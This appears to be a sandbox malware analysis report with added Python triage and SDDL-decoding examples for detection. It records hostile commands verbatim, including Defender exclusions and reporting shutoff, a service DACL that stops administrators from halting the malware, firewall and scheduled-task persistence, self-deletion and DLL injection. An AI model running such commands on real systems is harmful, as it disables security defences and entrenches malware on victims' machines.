Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2531 = "Chatham Islands Daylight Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | windefender.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | powershell.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" | windefender.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" | rfVcCs84JgkadF5csIFA6eOA.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | powershell.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" | LmaiU21tMWhBuhG73TdiEsIZ.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" | O8M8v9erpd6p9TZ5cZU71Tag.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | powershell.exe

Processes:
Z1z6oEWmHWh3S9fVhayDhyvW.exe
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | Z1z6oEWmHWh3S9fVhayDhyvW.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
un4.0.exe, PBCfG3wrCyp60tNkAdjwRCEQ.exe, RegAsm.exe, dialer.exe, powershell.exe, powershell.exe, powershell.exe, LmaiU21tMWhBuhG73TdiEsIZ.exe, rfVcCs84JgkadF5csIFA6eOA.exe, O8M8v9erpd6p9TZ5cZU71Tag.exe, powershell.exe, powershell.exe, powershell.exe, rfVcCs84JgkadF5csIFA6eOA.exe, O8M8v9erpd6p9TZ5cZU71Tag.exe, powershell.EXE, LmaiU21tMWhBuhG73TdiEsIZ.exe
pid | Process (consecutive identical rows collapsed, count in parentheses)
856 | un4.0.exe (2)
1464 | PBCfG3wrCyp60tNkAdjwRCEQ.exe (4)
5084 | RegAsm.exe (2)
1404 | dialer.exe (4)
756 | powershell.exe (2)
1564 | powershell.exe (2)
2608 | powershell.exe (2)
756 | powershell.exe
2608 | powershell.exe
1564 | powershell.exe
1352 | LmaiU21tMWhBuhG73TdiEsIZ.exe (2)
2980 | rfVcCs84JgkadF5csIFA6eOA.exe (2)
4640 | O8M8v9erpd6p9TZ5cZU71Tag.exe (2)
2732 | powershell.exe (2)
5696 | powershell.exe (2)
4100 | powershell.exe (2)
2732 | powershell.exe
5696 | powershell.exe
4100 | powershell.exe
6092 | rfVcCs84JgkadF5csIFA6eOA.exe (2)
6048 | O8M8v9erpd6p9TZ5cZU71Tag.exe (2)
6092 | rfVcCs84JgkadF5csIFA6eOA.exe (2)
6048 | O8M8v9erpd6p9TZ5cZU71Tag.exe (2)
6092 | rfVcCs84JgkadF5csIFA6eOA.exe (4)
6048 | O8M8v9erpd6p9TZ5cZU71Tag.exe (4)
6092 | rfVcCs84JgkadF5csIFA6eOA.exe (2)
6048 | O8M8v9erpd6p9TZ5cZU71Tag.exe (2)
5972 | powershell.EXE
6140 | LmaiU21tMWhBuhG73TdiEsIZ.exe (8)
-
Suspicious use of AdjustPrivilegeToken 30 IoCs
Processes:
msbuild.exe, powershell.exe, powershell.exe, powershell.exe, LmaiU21tMWhBuhG73TdiEsIZ.exe, rfVcCs84JgkadF5csIFA6eOA.exe, O8M8v9erpd6p9TZ5cZU71Tag.exe, powershell.exe, powershell.exe, powershell.exe, powershell.EXE, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.exe, powershell.EXE, powershell.exe, powershell.exe, csrss.exe, sc.exe, powershell.exe, powershell.exe, powershell.EXE
description | pid | Process
Token: SeDebugPrivilege | 1512 | msbuild.exe
Token: SeDebugPrivilege | 756 | powershell.exe
Token: SeDebugPrivilege | 1564 | powershell.exe
Token: SeDebugPrivilege | 2608 | powershell.exe
Token: SeDebugPrivilege | 1352 | LmaiU21tMWhBuhG73TdiEsIZ.exe
Token: SeImpersonatePrivilege | 1352 | LmaiU21tMWhBuhG73TdiEsIZ.exe
Token: SeDebugPrivilege | 2980 | rfVcCs84JgkadF5csIFA6eOA.exe
Token: SeImpersonatePrivilege | 2980 | rfVcCs84JgkadF5csIFA6eOA.exe
Token: SeDebugPrivilege | 4640 | O8M8v9erpd6p9TZ5cZU71Tag.exe
Token: SeImpersonatePrivilege | 4640 | O8M8v9erpd6p9TZ5cZU71Tag.exe
Token: SeDebugPrivilege | 2732 | powershell.exe
Token: SeDebugPrivilege | 5696 | powershell.exe
Token: SeDebugPrivilege | 4100 | powershell.exe
Token: SeDebugPrivilege | 5972 | powershell.EXE
Token: SeDebugPrivilege | 3652 | powershell.exe
Token: SeDebugPrivilege | 5332 | powershell.exe
Token: SeDebugPrivilege | 4640 | powershell.exe
Token: SeDebugPrivilege | 2696 | powershell.exe
Token: SeDebugPrivilege | 1444 | powershell.exe
Token: SeDebugPrivilege | 2732 | powershell.exe
Token: SeDebugPrivilege | 6104 | powershell.exe
Token: SeDebugPrivilege | 3896 | powershell.EXE
Token: SeDebugPrivilege | 5616 | powershell.exe
Token: SeDebugPrivilege | 5516 | powershell.exe
Token: SeSystemEnvironmentPrivilege | 5544 | csrss.exe
Token: SeSecurityPrivilege | 5448 | sc.exe
Token: SeSecurityPrivilege | 5448 | sc.exe
Token: SeDebugPrivilege | 4796 | powershell.exe
Token: SeDebugPrivilege | 5828 | powershell.exe
Token: SeDebugPrivilege | 5320 | powershell.EXE
-
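The two SeSecurityPrivilege rows for sc.exe (PID 5448) belong to the `sc sdset WinDefender ...` command in the windefender.exe branch of the process tree: rewriting the S: (SACL) part of a service security descriptor is what needs that privilege. The Python below is an added example written for this report, not code from the sample, from the sandbox or from Microsoft. It parses the SDDL string copied from the tree using the documented meaning of the two-letter access codes for service objects (a lookup table assumed here rather than anything read from a live Service Control Manager) and reports what each trustee can and cannot do.

```python
"""Decode the service security descriptor that the sample applies with
`sc sdset WinDefender ...` (windefender.exe branch of the process tree).

Added example for this report; not code from the sample, the sandbox or
Microsoft. SAMPLE_SDDL is the string from the tree. SERVICE_RIGHTS is the
documented meaning of SDDL access codes for service objects; nothing is
queried from a live Service Control Manager."""
import re
from typing import NamedTuple

# SDDL access codes as they apply to service objects (the same two letters
# mean something else on files or registry keys).
SERVICE_RIGHTS = {
    "CC": ("SERVICE_QUERY_CONFIG", 0x0001),
    "DC": ("SERVICE_CHANGE_CONFIG", 0x0002),
    "LC": ("SERVICE_QUERY_STATUS", 0x0004),
    "SW": ("SERVICE_ENUMERATE_DEPENDENTS", 0x0008),
    "RP": ("SERVICE_START", 0x0010),
    "WP": ("SERVICE_STOP", 0x0020),
    "DT": ("SERVICE_PAUSE_CONTINUE", 0x0040),
    "LO": ("SERVICE_INTERROGATE", 0x0080),
    "CR": ("SERVICE_USER_DEFINED_CONTROL", 0x0100),
    "SD": ("DELETE", 0x00010000),
    "RC": ("READ_CONTROL", 0x00020000),
    "WD": ("WRITE_DAC", 0x00040000),
    "WO": ("WRITE_OWNER", 0x00080000),
}
TRUSTEES = {"SY": "LocalSystem", "BA": "Builtin Administrators",
            "IU": "Interactive users", "SU": "Service logon", "WD": "Everyone"}

# Copied verbatim from the sc sdset command line in the process tree.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)"
               "(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")


class Ace(NamedTuple):
    section: str   # "D" = DACL, "S" = SACL
    kind: str      # "A" allow, "D" deny, "AU" audit
    flags: str     # e.g. "FA" on an audit ACE = log failed access attempts
    rights: tuple  # two-letter codes, in order
    trustee: str


def parse_sddl(sddl: str) -> list:
    """Split D:(...)(...)S:(...) into ACEs; rejects codes not valid for services."""
    aces = []
    for section, body in re.findall(r"([DS]):((?:\([^)]*\))*)", sddl):
        for ace in re.findall(r"\(([^)]*)\)", body):
            fields = ace.split(";")
            if len(fields) != 6:
                raise ValueError(f"unexpected ACE layout: {ace!r}")
            kind, flags, rights, _obj, _inh, trustee = fields
            codes = tuple(rights[i:i + 2] for i in range(0, len(rights), 2))
            bad = [c for c in codes if c not in SERVICE_RIGHTS]
            if bad:
                raise ValueError(f"unknown service right(s) {bad} in {ace!r}")
            aces.append(Ace(section, kind, flags, codes, trustee))
    return aces


def mask_of(codes) -> int:
    return sum(SERVICE_RIGHTS[c][1] for c in codes)


def names_of(mask: int) -> list:
    return [name for name, bit in SERVICE_RIGHTS.values() if mask & bit]


def effective_rights(aces, trustee: str):
    """(allowed, denied) masks for one trustee from the DACL alone, ignoring
    group membership. Windows walks ACEs in order, so a deny placed after an
    allow for the same bits would be ineffective (which is why canonical order
    puts denies first); here the BA allow ACE already omits WP and DT, so the
    trailing deny gives the same result either way."""
    allowed = denied = 0
    for a in aces:
        if a.section != "D" or a.trustee != trustee:
            continue
        if a.kind == "A":
            allowed |= mask_of(a.rights)
        elif a.kind == "D":
            denied |= mask_of(a.rights)
    return allowed & ~denied, denied


def summarize(sddl: str = SAMPLE_SDDL) -> dict:
    aces = parse_sddl(sddl)
    out = {}
    for sid in sorted({a.trustee for a in aces if a.section == "D"}):
        allowed, denied = effective_rights(aces, sid)
        out[sid] = {"who": TRUSTEES.get(sid, sid),
                    "allowed": names_of(allowed), "denied": names_of(denied)}
    return out


def admins_cannot_stop(sddl: str = SAMPLE_SDDL) -> bool:
    """Detection: Builtin Administrators end up without SERVICE_STOP."""
    return "SERVICE_STOP" not in summarize(sddl)["BA"]["allowed"]


if __name__ == "__main__":
    for sid, info in summarize().items():
        print(f"{sid} ({info['who']}): denied={info['denied']}")
    print("admins can stop the service:", not admins_cannot_stop())
```

For the string from this report the result is that LocalSystem keeps SERVICE_STOP and SERVICE_PAUSE_CONTINUE while Builtin Administrators lose both, so `sc stop` or `net stop` from an elevated prompt fails with access denied. Administrators do keep WRITE_DAC, WRITE_OWNER and DELETE, so the descriptor can be reset with another `sc sdset` or the service removed with `sc delete` from an elevated prompt; no offline repair is needed for this part of the persistence.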
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
un4.1.exepid Process 4232 un4.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe, msbuild.exe, PPShZLAKQ6L4xgy8fCGXP1YJ.exe, MaKDbFZoKxsMGQUEadkOBsmF.exe, RegAsm.exe, un4.1.exe, Z1z6oEWmHWh3S9fVhayDhyvW.exe, cmd.exe
description | pid | Process | procid_target (consecutive identical rows collapsed, count in parentheses)
PID 4204 wrote to memory of 1512 | 4204 | 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe | 87 (8)
PID 4204 wrote to memory of 2304 | 4204 | 8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe | 88 (3)
PID 1512 wrote to memory of 832 | 1512 | msbuild.exe | 92 (3)
PID 1512 wrote to memory of 4640 | 1512 | msbuild.exe | 201 (3)
PID 1512 wrote to memory of 2980 | 1512 | msbuild.exe | 94 (3)
PID 1512 wrote to memory of 4912 | 1512 | msbuild.exe | 138 (3)
PID 1512 wrote to memory of 1464 | 1512 | msbuild.exe | 98 (3)
PID 4912 wrote to memory of 5084 | 4912 | PPShZLAKQ6L4xgy8fCGXP1YJ.exe | 99 (11)
PID 832 wrote to memory of 856 | 832 | MaKDbFZoKxsMGQUEadkOBsmF.exe | 102 (3)
PID 1512 wrote to memory of 1352 | 1512 | msbuild.exe | 104 (3)
PID 832 wrote to memory of 4232 | 832 | MaKDbFZoKxsMGQUEadkOBsmF.exe | 107 (3)
PID 5084 wrote to memory of 1404 | 5084 | RegAsm.exe | 110 (5)
PID 1512 wrote to memory of 440 | 1512 | msbuild.exe | 111 (2)
PID 4232 wrote to memory of 1604 | 4232 | un4.1.exe | 114 (3)
PID 1512 wrote to memory of 1880 | 1512 | msbuild.exe | 120 (3)
PID 1880 wrote to memory of 2260 | 1880 | Z1z6oEWmHWh3S9fVhayDhyvW.exe | 121 (3)
PID 1604 wrote to memory of 4948 | 1604 | cmd.exe | 135 (2)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
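Before the process tree, a worked triage pass over the command lines it records. This is an added example for this report, not tooling from the sandbox or from any of the families involved; the sample lines are copied from the tree, while the rule names, the set of System32-only process names and the injector heuristic are choices made here. -EncodedCommand is decoded the way PowerShell defines it (base64 over UTF-16LE text), which turns the schtasks payload into `start-process -WindowStyle Hidden gpupdate.exe /force`, a forced Group Policy refresh issued right after the REG ADD writes to the Windows Defender policy keys.

```python
"""Triage rules for the command lines recorded in the process tree.

Added example for this report, not tooling from the sandbox or from any of
the malware families involved. SAMPLE_CMDLINES are copied from the tree; the
rule names, SYSTEM32_ONLY and the injector heuristic are my own choices.
-EncodedCommand decoding follows PowerShell's documented format (base64 of
UTF-16LE text)."""
import base64
import re

# Constructed from the tree above: one line per technique the rules cover.
SAMPLE_CMDLINES = [
    'netsh advfirewall firewall add rule name="csrss" dir=in action=allow '
    'program="C:\\Windows\\rss\\csrss.exe" enable=yes',
    'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\\Windows\\rss\\csrss.exe" /TN csrss /F',
    'sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)'
    '(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)'
    'S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions" '
    '/f /v "exe" /t REG_SZ /d 0 /reg:64',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" '
    '/f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    'schtasks /CREATE /TN "gDKGtXeHw" /SC once /ST 07:43:34 /F /RU "Admin" /TR '
    '"powershell -WindowStyle Hidden -EncodedCommand '
    'cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    '"C:\\Windows\\System32\\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & '
    'Del C:\\Users\\Admin\\AppData\\Local\\Temp\\JKEGDHCFCA.exe',
    'C:\\Users\\Admin\\AppData\\Local\\Temp\\csrss\\injector\\injector.exe taskmgr.exe '
    'C:\\Users\\Admin\\AppData\\Local\\Temp\\csrss\\injector\\NtQuerySystemInformationHook.dll',
]

# Process names that legitimately exist only under %SystemRoot%\System32.
SYSTEM32_ONLY = {"csrss.exe", "smss.exe", "lsass.exe", "services.exe",
                 "wininit.exe", "winlogon.exe"}
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
EXE_PATH_RE = re.compile(r'[A-Za-z]:\\[^"\s]+\.exe', re.IGNORECASE)
DENY_BA_RE = re.compile(r"\(D;;([A-Z]+);;;BA\)")   # deny ACEs aimed at Builtin Administrators


def decode_encoded_command(cmdline: str):
    """Plaintext of a PowerShell -EncodedCommand argument, or None if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")


def triage(cmdline: str) -> list:
    """Rule names that fire for one command line (empty list = nothing seen)."""
    hits = []
    low = cmdline.lower()
    # A System32-only process name launched from, or registered at, another path.
    for path in EXE_PATH_RE.findall(cmdline):
        name = path.rsplit("\\", 1)[-1].lower()
        if name in SYSTEM32_ONLY and not path.lower().endswith("\\windows\\system32\\" + name):
            hits.append("masquerade:" + path)
    if "netsh" in low and "advfirewall" in low and "action=allow" in low:
        hits.append("firewall-allow-rule-added")
    if "schtasks" in low and "/create" in low:
        hits.append("schtask-created")
        if "/rl highest" in low:
            hits.append("schtask-runlevel-highest")
    for codes in DENY_BA_RE.findall(cmdline):
        pairs = {codes[i:i + 2] for i in range(0, len(codes), 2)}
        if "WP" in pairs:   # WP on a service object is SERVICE_STOP
            hits.append("service-stop-denied-to-admins")
    if "reg add" in low and "\\windows defender\\" in low:
        hits.append("defender-policy-tamper")
        if "\\exclusions\\" in low:
            hits.append("defender-exclusion-added")
        if "spynetreporting" in low and re.search(r"/d\s+0\b", low):
            hits.append("maps-reporting-disabled")
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        hits.append("encoded-powershell:" + decoded)
    if re.search(r"\bping\s+\S+.*&\s*del\b", low):
        hits.append("self-delete-via-ping-delay")
    # Heuristic: <loader>.exe <target>.exe <payload>.dll is the shape of a DLL injector.
    if re.search(r"\.exe\s+\S+\.exe\s+\S+\.dll\b", low):
        hits.append("injector-exe-target-dll-args")
    return hits


def triage_all(cmdlines=SAMPLE_CMDLINES) -> dict:
    return {c: triage(c) for c in cmdlines}


if __name__ == "__main__":
    for cmd, hits in triage_all().items():
        print(cmd[:60] + "...", "->", hits)
```

Two caveats when lifting these rules into a real detection: the `-e` alias in ENC_RE is deliberately loose and will want a stricter context check in production, and the masquerade rule keys on the file name only, so it is a cheap first filter rather than a verdict on its own. The firewall, scheduled-task and service-DACL rules each fire on a single command line, which is the point: every one of those lines in this tree is a persistence or defence-evasion step that a process-creation log captures verbatim.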
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2512
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1404
-
-
C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"C:\Users\Admin\AppData\Local\Temp\8c2daeab0a4f1cf937c65a17fffe6f50a33d102c5ab4638e2438211cfefe544d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"C:\Users\Admin\Pictures\MaKDbFZoKxsMGQUEadkOBsmF.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:832 -
C:\Users\Admin\AppData\Local\Temp\un4.0.exe"C:\Users\Admin\AppData\Local\Temp\un4.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:856 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"5⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:5620 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\JKEGDHCFCA.exe7⤵PID:5956
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4100
-
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:5528
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 27325⤵
- Program crash
PID:5668
-
-
-
C:\Users\Admin\AppData\Local\Temp\un4.1.exe"C:\Users\Admin\AppData\Local\Temp\un4.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4232 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:1604 -
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:4948
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:5032
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 832 -s 15124⤵
- Program crash
PID:4948
-
-
-
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"C:\Users\Admin\Pictures\O8M8v9erpd6p9TZ5cZU71Tag.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6048 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5268
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:5328
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:2732 -
